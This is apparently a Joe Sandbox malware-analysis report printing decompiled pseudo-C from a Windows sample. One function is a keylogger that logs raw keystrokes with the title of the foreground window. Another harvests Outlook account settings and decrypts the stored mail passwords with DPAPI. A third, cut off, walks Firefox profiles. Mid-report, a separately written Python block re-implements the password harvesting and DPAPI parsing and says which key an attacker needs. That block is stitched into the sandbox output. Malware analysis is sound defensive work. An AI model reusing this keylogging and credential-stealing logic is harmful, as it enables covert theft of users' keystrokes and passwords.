                                      				void* _t110;
                                      				intOrPtr _t111;
                                      				intOrPtr _t113;
                                      				long _t116;
                                      				intOrPtr _t117;
                                      				intOrPtr _t119;
                                      				long _t121;
                                      				intOrPtr _t122;
                                      				intOrPtr _t124;
                                      				void* _t126;
                                      				intOrPtr _t128;
                                      				intOrPtr _t130;
                                      				long _t132;
                                      				intOrPtr _t133;
                                      				intOrPtr _t135;
                                      				DWORD* _t136;
                                      				long _t137;
                                      				intOrPtr _t138;
                                      				long _t142;
                                      				void* _t152;
                                      				long _t164;
                                      				intOrPtr _t178;
                                      				intOrPtr _t189;
                                      				void* _t195;
                                      				struct _OVERLAPPED* _t198;
                                      				struct _OVERLAPPED* _t201;
                                      				void* _t204;
                                      				void* _t206;
                                      				void* _t208;
                                      				signed int _t209;
                                      				void* _t212;
                                      				void* _t213;
                                      
                                      				_t198 = 0;
                                      				_v600 = 0;
                                      				E00251052( &_v524, 0, 0x208);
                                      				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                      				_t201 = 0;
                                      				_v604 = 0;
                                      				_t76 = _a8 - 1;
                                      				if(_t76 == 0) {
                                      					_t77 = 6;
                                      					_v570 = _t77;
                                      					__eflags = 1;
                                      					_v564 = _a4;
                                      					_v568 = 0x130;
                                      					_v572 = 1;
                                      					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                      				} else {
                                      					_t82 = _t76 - 0xf;
                                      					if(_t82 == 0) {
                                      						PostQuitMessage(0);
                                      					} else {
                                      						if(_t82 == 0xef) {
                                      							_t84 =  &_v600;
                                      							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                      							__eflags = _t84 - 0xffffffff;
                                      							if(_t84 != 0xffffffff) {
                                      								_t164 = E00255ADB(_v620);
                                      								_v596 = _t164;
                                      								__eflags = _t164;
                                      								if(_t164 != 0) {
                                      									_t86 =  &_v620;
                                      									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                      									__eflags = _t86 - _v640;
                                      									if(_t86 == _v640) {
                                      										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                      										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                      											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                      											__eflags = _t88;
                                      											if(_t88 <= 0) {
                                      												E0025312C( &_v644, _t195, L"Unknow");
                                      											} else {
                                      												E00253264( &_v648, E00253412( &_v636,  &_v564));
                                      												E00255A2D(_v644);
                                      											}
                                      											E00258133( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                      											E00253264( &_v632,  &_v644);
                                      											_t93 =  *0x266690; // 0x0
                                      											E00253297( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                      											_t96 =  *0x266690; // 0x0
                                      											__eflags =  *_t96 - _t198;
                                      											if( *_t96 != _t198) {
                                      												_t213 = _t212 - 0x10;
                                      												__eflags = _t96 + 0xa18;
                                      												E00251301(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                      												_t208 = _t213 - 0x10;
                                      												E0025345A(_t208,  &_v636);
                                      												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                      												 *((short*)(_t208 + 8)) = _v632;
                                      												E0025345A(_t208 + 0xc,  &_v628);
                                      												_t152 = E0025460B( &_v612, __eflags);
                                      												_t189 =  *0x266690; // 0x0
                                      												E00254B53( *((intOrPtr*)(_t189 + 0xa50)), _t152);
                                      												E002545E1( &_v648);
                                      												_t96 =  *0x266690; // 0x0
                                      											}
                                      											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                      											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                      												_t100 = lstrlenW(_t96 + 0x210);
                                      												__eflags = _t100;
                                      												_t101 =  *0x266690; // 0x0
                                      												if(_t100 == 0) {
                                      													L17:
                                      													_t102 = _t101 + 0x210;
                                      													__eflags = _t102;
                                      													lstrcpyW(_t102, _v632);
                                      													_t104 =  *0x266690; // 0x0
                                      													 *(_t104 + 0xa10) = _t198;
                                      												} else {
                                      													_t142 = E00253075( &_v648, E00253412( &_v636, _t101 + 0x210));
                                      													E00255A2D(_v644);
                                      													_t101 =  *0x266690; // 0x0
                                      													_v644 = _t198;
                                      													__eflags = _t142;
                                      													if(_t142 == 0) {
                                      														goto L17;
                                      													} else {
                                      														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                      													}
                                      												}
                                      												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
                                      												_t178 =  *0x266690; // 0x0
                                      												 *(_t178 + 4) = _t105;
                                      												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                      												if(__eflags == 0) {
                                      													_t49 = _t178 + 8; // 0x8
                                      													_t204 = L"\r\n";
                                      													_t116 = lstrlenW(_t204);
                                      													_t117 =  *0x266690; // 0x0
                                      													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
                                      													_t119 =  *0x266690; // 0x0
                                      													_t121 = lstrlenW(_t204);
                                      													_t122 =  *0x266690; // 0x0
                                      													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
                                      													_t124 =  *0x266690; // 0x0
                                      													_t126 = E0025308E( &_v632);
                                      													_t128 =  *0x266690; // 0x0
                                      													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
                                      													_t130 =  *0x266690; // 0x0
                                      													_t206 = L"\r\n";
                                      													_t132 = lstrlenW(_t206);
                                      													_t133 =  *0x266690; // 0x0
                                      													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
                                      													_t135 =  *0x266690; // 0x0
                                      													_t136 = _t135 + 8;
                                      													__eflags = _t136;
                                      													_t137 = lstrlenW(_t206);
                                      													_t138 =  *0x266690; // 0x0
                                      													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
                                      													_t178 =  *0x266690; // 0x0
                                      												}
                                      												_t58 = _t178 + 8; // 0x8
                                      												_t109 = lstrlenW(E0025804D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                      												__eflags = _t109;
                                      												_t110 = E0025804D( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                      												_t111 =  *0x266690; // 0x0
                                      												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
                                      												_t113 =  *0x266690; // 0x0
                                      												CloseHandle( *(_t113 + 4));
                                      											}
                                      											E00255A2D(_v620);
                                      											_v620 = _t198;
                                      											E00255A2D(_v632);
                                      											_t201 = _v644;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                      						}
                                      					}
                                      				}
                                      				E00255A2D(_t201);
                                      				return _t198;
                                      			}

                                      0x00257cc2
                                      0x00257ccf
                                      0x00257cd3
                                      0x00257cdb
                                      0x00257cde
                                      0x00257ce0
                                      0x00257ce4
                                      0x00257ce7
                                      0x00258010
                                      0x00258013
                                      0x0025801b
                                      0x0025801e
                                      0x00258028
                                      0x00258030
                                      0x00258035
                                      0x00257ced
                                      0x00257ced
                                      0x00257cf0
                                      0x00258006
                                      0x00257cf6
                                      0x00257cfb
                                      0x00257d18
                                      0x00257d26
                                      0x00257d2c
                                      0x00257d2f
                                      0x00257d3e
                                      0x00257d40
                                      0x00257d44
                                      0x00257d46
                                      0x00257d4e
                                      0x00257d5c
                                      0x00257d62
                                      0x00257d66
                                      0x00257d6c
                                      0x00257d73
                                      0x00257d8a
                                      0x00257d90
                                      0x00257d92
                                      0x00257dc0
                                      0x00257d94
                                      0x00257da7
                                      0x00257db0
                                      0x00257db0
                                      0x00257dcc
                                      0x00257dda
                                      0x00257ddf
                                      0x00257dec
                                      0x00257df1
                                      0x00257df6
                                      0x00257df8
                                      0x00257dfa
                                      0x00257dfd
                                      0x00257e05
                                      0x00257e11
                                      0x00257e16
                                      0x00257e22
                                      0x00257e2a
                                      0x00257e33
                                      0x00257e3c
                                      0x00257e41
                                      0x00257e4e
                                      0x00257e57
                                      0x00257e5c
                                      0x00257e5c
                                      0x00257e61
                                      0x00257e67
                                      0x00257e73
                                      0x00257e7c
                                      0x00257e7e
                                      0x00257e83
                                      0x00257ebe
                                      0x00257ec2
                                      0x00257ec2
                                      0x00257ec8
                                      0x00257ece
                                      0x00257ed3
                                      0x00257e85
                                      0x00257e99
                                      0x00257ea4
                                      0x00257ea9
                                      0x00257eae
                                      0x00257eb2
                                      0x00257eb4
                                      0x00000000
                                      0x00257eb6
                                      0x00257eb6
                                      0x00257eb6
                                      0x00257eb4
                                      0x00257ee8
                                      0x00257eee
                                      0x00257efa
                                      0x00257efd
                                      0x00257f03
                                      0x00257f0a
                                      0x00257f0d
                                      0x00257f14
                                      0x00257f1b
                                      0x00257f24
                                      0x00257f26
                                      0x00257f31
                                      0x00257f38
                                      0x00257f41
                                      0x00257f43
                                      0x00257f55
                                      0x00257f5d
                                      0x00257f66
                                      0x00257f68
                                      0x00257f6d
                                      0x00257f78
                                      0x00257f7f
                                      0x00257f88
                                      0x00257f8a
                                      0x00257f90
                                      0x00257f90
                                      0x00257f95
                                      0x00257f9c
                                      0x00257fa5
                                      0x00257fa7
                                      0x00257fa7
                                      0x00257fb1
                                      0x00257fc8
                                      0x00257fc8
                                      0x00257fcb
                                      0x00257fd1
                                      0x00257fd9
                                      0x00257fdb
                                      0x00257fe3
                                      0x00257fe3
                                      0x00257fed
                                      0x00257ff6
                                      0x00257ffa
                                      0x00257fff
                                      0x00257fff
                                      0x00257d73
                                      0x00257d66
                                      0x00257d46
                                      0x00257cfd
                                      0x00257d0f
                                      0x00257d0f
                                      0x00257cfb
                                      0x00257cf0
                                      0x0025803d
                                      0x0025804a

                                      APIs
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00257D09
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00257D26
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00257D5C
                                      • GetForegroundWindow.USER32 ref: 00257D79
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00257D8A
                                      • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00257E73
                                      • PostQuitMessage.USER32(00000000), ref: 00258006
                                      • RegisterRawInputDevices.USER32 ref: 00258035
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                      • String ID: Unknow
                                      • API String ID: 3853268301-1240069140
                                      • Opcode ID: 8d6e7914fe2bef65fffa2bea62fbe7de81dd619f7b480b6375866687cccf0871
                                      • Instruction ID: 86d58c84572dd9f7084801dd0b7cfa9f831b80d3b5ca71c04dd4d2649ebdf05c
                                      • Opcode Fuzzy Hash: 8d6e7914fe2bef65fffa2bea62fbe7de81dd619f7b480b6375866687cccf0871
                                      • Instruction Fuzzy Hash: 8AA18C71114202AFC704EF64EC99E6B7BE8FF85306F048518FD59932A1DBB0E928CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 98%
                                      			E00258F40(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                      				int _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v292;
                                      				char _v556;
                                      				char _v820;
                                      				char _v9012;
                                      				char _v17204;
                                      				long _t124;
                                      				long _t130;
                                      				long _t136;
                                      				long _t142;
                                      				void* _t180;
                                      				void* _t181;
                                      				void* _t199;
                                      				void* _t207;
                                      				void* _t208;
                                      				void* _t209;
                                      				void* _t210;
                                      				void* _t211;
                                      				void* _t212;
                                      				void* _t213;
                                      				void* _t214;
                                      				void* _t215;
                                      				void* _t216;
                                      				void* _t217;
                                      
                                      				_t199 = __edx;
                                      				_t181 = __ecx;
                                      				E00251130(0x4334, __ecx);
                                      				_v8 = 0x1000;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				_t180 = _t181;
                                      				_v16 = 0;
                                      				E00251052( &_v292, 0, 0x104);
                                      				E00251052( &_v556, 0, 0x104);
                                      				E00251052( &_v820, 0, 0x104);
                                      				E00251052( &_v9012, 0, _v8);
                                      				_t207 = _a4;
                                      				_t209 = _t208 + 0x30;
                                      				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0025312C( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t210 = _t209 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0025312C( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t211 = _t210 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0025312C( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t212 = _t211 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0025312C( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t213 = _t212 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0025312C( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t214 = _t213 + 0xc;
                                      				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                      				_t225 = _t124;
                                      				if(_t124 == 0) {
                                      					E00251052( &_v17204, _t124, 0x1000);
                                      					E002592D8( &_v9012,  &_v17204, _t225, _v8);
                                      					_t214 = _t214 + 0x10;
                                      					E0025312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t215 = _t214 + 0xc;
                                      				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t226 = _t130;
                                      				if(_t130 == 0) {
                                      					E00251052( &_v17204, _t130, 0x1000);
                                      					E002592D8( &_v9012,  &_v17204, _t226, _v8);
                                      					_t215 = _t215 + 0x10;
                                      					E0025312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t216 = _t215 + 0xc;
                                      				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t227 = _t136;
                                      				if(_t136 == 0) {
                                      					E00251052( &_v17204, _t136, 0x1000);
                                      					E002592D8( &_v9012,  &_v17204, _t227, _v8);
                                      					_t216 = _t216 + 0x10;
                                      					E0025312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00251052( &_v9012, 0, 0x1000);
                                      				_t217 = _t216 + 0xc;
                                      				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t228 = _t142;
                                      				if(_t142 == 0) {
                                      					E00251052( &_v17204, _t142, 0x1000);
                                      					E002592D8( &_v9012,  &_v17204, _t228, _v8);
                                      					_t217 = _t217 + 0x10;
                                      					E0025312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v12 = 3;
                                      				if(E0025308E( &_v24) > 0) {
                                      					E00251EB9(_t217 - 0x10,  &_v24);
                                      					E00251EEF(_t180);
                                      				}
                                      				E0025138F( &_v24);
                                      				return 1;
                                      			}

                                      0x00258f40
                                      0x00258f40
                                      0x00258f48
                                      0x00258f52
                                      0x00258f5e
                                      0x00258f68
                                      0x00258f6d
                                      0x00258f6f
                                      0x00258f72
                                      0x00258f80
                                      0x00258f8e
                                      0x00258f9e
                                      0x00258fa3
                                      0x00258fa9
                                      0x00258fc6
                                      0x00258fd2
                                      0x00258fd2
                                      0x00258fe2
                                      0x00258fec
                                      0x00258ff1
                                      0x0025900d
                                      0x00259019
                                      0x00259019
                                      0x00259024
                                      0x00259030
                                      0x00259035
                                      0x00259051
                                      0x0025905d
                                      0x0025905d
                                      0x00259068
                                      0x00259074
                                      0x00259079
                                      0x00259095
                                      0x002590a1
                                      0x002590a1
                                      0x002590ac
                                      0x002590b8
                                      0x002590bd
                                      0x002590d9
                                      0x002590e5
                                      0x002590e5
                                      0x002590f0
                                      0x002590fc
                                      0x00259101
                                      0x00259119
                                      0x0025911b
                                      0x0025911d
                                      0x0025912c
                                      0x00259140
                                      0x00259145
                                      0x00259152
                                      0x00259152
                                      0x0025915d
                                      0x00259169
                                      0x0025916e
                                      0x00259186
                                      0x00259188
                                      0x0025918a
                                      0x00259199
                                      0x002591ad
                                      0x002591b2
                                      0x002591bf
                                      0x002591bf
                                      0x002591ca
                                      0x002591d6
                                      0x002591db
                                      0x002591f3
                                      0x002591f5
                                      0x002591f7
                                      0x00259206
                                      0x0025921a
                                      0x0025921f
                                      0x0025922c
                                      0x0025922c
                                      0x00259237
                                      0x00259243
                                      0x00259248
                                      0x00259260
                                      0x00259262
                                      0x00259264
                                      0x00259273
                                      0x00259287
                                      0x0025928c
                                      0x00259299
                                      0x00259299
                                      0x002592a1
                                      0x002592af
                                      0x002592ba
                                      0x002592c1
                                      0x002592c1
                                      0x002592c9
                                      0x002592d5

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,75F645DD,757992CF,00000000,?,00258F04), ref: 00258FC2
                                      • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,75F645DD,757992CF), ref: 00259009
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0025904D
                                      • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00259091
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 002590D5
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00259119
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00259186
                                      • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 002591F3
                                      • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00259260
                                        • Part of subcall function 002592D8: GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0025928C,00001000,?,00000000,00001000), ref: 002592F6
                                        • Part of subcall function 002592D8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0025928C), ref: 0025932C
                                        • Part of subcall function 002592D8: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00259363
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                      • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                      • API String ID: 6593746-2537589853
                                      • Opcode ID: 25a7dd5b7a599bd2bbc907e8c7af799bca2d755d698200dc7c7b54cb881ed341
                                      • Instruction ID: f94efc0f48ccf5990c346015c147290bf063669be80e2c3fff4266b5aff9b8ea
                                      • Opcode Fuzzy Hash: 25a7dd5b7a599bd2bbc907e8c7af799bca2d755d698200dc7c7b54cb881ed341
                                      • Instruction Fuzzy Hash: 0FA101B292021DBADF25EAA0DD45FDE737CAF14741F1001A5FA05F60C1E674AB988F68
                                      Uniqueness

                                      Uniqueness Score: 10.55%
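The RegQueryValueExW sequence listed under APIs above reads nine Outlook account values and hands the password values to a helper built around GlobalAlloc and CryptUnprotectData, writing the literal "Could not decrypt" when that call fails. The following is an added example, not code from the sample or from Joe Sandbox: it models that walk offline, with CryptUnprotectData replaced by an injectable callable, and adds the check an analyst wants when looking at such values in a registry export, namely locating the DPAPI blob by its provider-GUID header and reading the master-key GUID out of it. The registry key the values live under is not shown on this page and is not assumed here; the account data, the two-byte prefix in front of the blob, and the blob payload are all constructed.

```python
"""Offline model of the Outlook account-value harvesting in the function above.

Added example, not code from the analysed sample. It mirrors the nine value names
the sample queries and its 'decrypt, else "Could not decrypt"' behaviour, with
CryptUnprotectData swapped for an injectable callable. The DPAPI blob header layout
(version, provider GUID, master-key version, master-key GUID, flags, description)
is the documented one; everything after the description in the constructed
sample is filler, not real ciphertext.
"""
import struct
import uuid
from typing import Callable, Dict, Optional, Tuple

# Value names from the RegQueryValueExW calls listed in the report.
ACCOUNT_VALUES = ["Account Name", "Email", "POP3 Server", "POP3 User", "SMTP Server"]
PASSWORD_VALUES = ["POP3 Password", "SMTP Password", "HTTP Password", "IMAP Password"]

# dwVersion = 1 followed by the DPAPI provider GUID, both little-endian.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
DPAPI_HEADER = struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le


def find_dpapi_blob(raw: bytes) -> Optional[bytes]:
    """Locate the blob by header instead of assuming offset 0, so a short prefix
    in front of it does not hide it."""
    idx = raw.find(DPAPI_HEADER)
    return None if idx < 0 else raw[idx:]


def parse_dpapi_header(blob: bytes) -> Tuple[Dict[str, object], int]:
    """Parse the fixed leading fields; returns (fields, offset just past the
    description). The master-key GUID names the file under
    %APPDATA%\\Microsoft\\Protect\\<SID>\\ that is needed to decrypt the blob."""
    version, = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])
    mk_version, = struct.unpack_from("<I", blob, 20)
    mk_guid = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    desc = blob[48:48 + desc_len].decode("utf-16-le", errors="replace").rstrip("\x00")
    fields = {"version": version, "provider": provider, "master_key_version": mk_version,
              "master_key_guid": mk_guid, "flags": flags, "description": desc}
    return fields, 48 + desc_len


def decode_reg_sz(raw: bytes) -> str:
    """REG_SZ data as returned by RegQueryValueExW: UTF-16LE with a terminator."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def harvest_account(values: Dict[str, bytes],
                    unprotect: Callable[[bytes], Optional[bytes]]) -> Dict[str, str]:
    """Walk one account's values as the sample does: plain fields are copied,
    password fields go through `unprotect` (CryptUnprotectData in the sample)
    and fall back to the literal 'Could not decrypt' on failure."""
    out: Dict[str, str] = {}
    for name in ACCOUNT_VALUES:
        if name in values:
            out[name] = decode_reg_sz(values[name])
    for name in PASSWORD_VALUES:
        raw = values.get(name)
        if raw is None:
            continue
        blob = find_dpapi_blob(raw)
        plain = unprotect(blob) if blob is not None else None
        out[name] = decode_reg_sz(plain) if plain is not None else "Could not decrypt"
    return out


# ---- constructed sample data (not from the analysed binary) ----
SAMPLE_MASTER_KEY = uuid.UUID("12345678-1234-5678-1234-567812345678")


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le") + b"\x00\x00"


def build_fake_blob(master_key: uuid.UUID, payload: bytes) -> bytes:
    """Header fields laid out as in a real blob; the payload is stored in clear so
    fake_unprotect can 'decrypt' it. Never treat this as a real DPAPI blob."""
    return (DPAPI_HEADER + struct.pack("<I", 1) + master_key.bytes_le
            + struct.pack("<II", 0, 0) + payload)


SAMPLE_ACCOUNT: Dict[str, bytes] = {
    "Account Name": _wide("alice@example.test"),
    "Email": _wide("alice@example.test"),
    "POP3 Server": _wide("pop.example.test"),
    "POP3 User": _wide("alice"),
    # constructed two-byte prefix in front of the blob, to exercise the header search
    "POP3 Password": b"\x02\x00" + build_fake_blob(SAMPLE_MASTER_KEY, _wide("hunter2")),
}


def fake_unprotect(blob: bytes) -> Optional[bytes]:
    """Stand-in for CryptUnprotectData on the constructed blob: skip the header."""
    _, offset = parse_dpapi_header(blob)
    return blob[offset:]


def refuse_unprotect(blob: bytes) -> Optional[bytes]:
    """Models CryptUnprotectData failing (wrong user context, missing master key)."""
    return None


if __name__ == "__main__":
    print(harvest_account(SAMPLE_ACCOUNT, fake_unprotect))
    print(harvest_account(SAMPLE_ACCOUNT, refuse_unprotect))
```

The split between `find_dpapi_blob` and `parse_dpapi_header` is deliberate: the first is enough to flag a value as DPAPI-protected during triage, the second tells you which master key (and so which user logon secret) an attacker needs, which is exactly why a stealer running in the victim's session succeeds where an offline copy of the hive does not.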

                                      C-Code - Quality: 95%
                                      			E002598B0(intOrPtr __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				WCHAR* _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				int _v56;
                                      				char _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v88;
                                      				long _v92;
                                      				int _v96;
                                      				intOrPtr _v100;
                                      				char _v104;
                                      				char _v108;
                                      				char _v112;
                                      				void* _v116;
                                      				int _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				char _v152;
                                      				int _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				char* _t165;
                                      				void* _t167;
                                      				int _t189;
                                      				int _t190;
                                      				int _t193;
                                      				int _t207;
                                      				WCHAR* _t215;
                                      				void* _t217;
                                      				int _t221;
                                      				void* _t230;
                                      				void* _t236;
                                      				void* _t242;
                                      				int _t281;
                                      				int _t283;
                                      				char* _t293;
                                      				char* _t325;
                                      				void* _t386;
                                      				long _t389;
                                      				intOrPtr _t391;
                                      				intOrPtr _t392;
                                      				WCHAR* _t393;
                                      				int _t394;
                                      				void* _t395;
                                      				void* _t396;
                                      				void* _t397;
                                      
                                      				_t397 = __eflags;
                                      				_t392 = __ecx;
                                      				_v32 = __ecx;
                                      				E00253412( &_v24, L"Profile");
                                      				_t281 = 0;
                                      				E00251052( &_v1224, 0, 0x208);
                                      				_t396 = _t395 + 0xc;
                                      				_v92 = 0;
                                      				_t389 = 0;
                                      				E00251052( &_v704, 0, 0x104);
                                      				_t385 =  &_v704;
                                      				if(E0025ADBE(L"firefox.exe",  &_v704, _t397) != 0) {
                                      					_t293 =  &_v44;
                                      					E00253412(_t293,  &_v704);
                                      					lstrcatW( &_v704, L"\\firefox.exe");
                                      					GetBinaryTypeW( &_v704,  &_v92);
                                      					_t399 = _v92 - 6;
                                      					_t165 =  &_v44;
                                      					if(_v92 != 6) {
                                      						_push(0);
                                      					} else {
                                      						_push(1);
                                      					}
                                      					_push(_t293);
                                      					E0025345A(_t396, _t165);
                                      					_t167 = E0025A6A6(_t392, _t385, _t399);
                                      					_t400 = _t167;
                                      					if(_t167 != 0) {
                                      						E00253297( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
                                      						E0025345A( &_v36,  &_a4);
                                      						E00253297( &_v36, _t385, _t400, L"profiles.ini");
                                      						E00253264( &_v24, E00253412( &_v40, L"Profile"));
                                      						E00255A2D(_v40);
                                      						E0025309F( &_v24, _t385, _t400, _t281);
                                      						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
                                      							_t389 = _t389 + 1;
                                      							_v40 = _t389;
                                      							E00253264( &_v24, E00253412( &_v96, L"Profile"));
                                      							E00255A2D(_v96);
                                      							_v96 = _t281;
                                      							E0025309F( &_v24, _t385, __eflags, _t389);
                                      							E0025345A( &_v12,  &_a4);
                                      							E00253297( &_v12, _t385, __eflags,  &_v1224);
                                      							E00253381( &_v12,  &_v28);
                                      							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
                                      							__eflags = _t189;
                                      							if(_t189 == 0) {
                                      								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
                                      								_v156 = _t190;
                                      								__eflags = _t190;
                                      								if(_t190 == 0) {
                                      									goto L7;
                                      								} else {
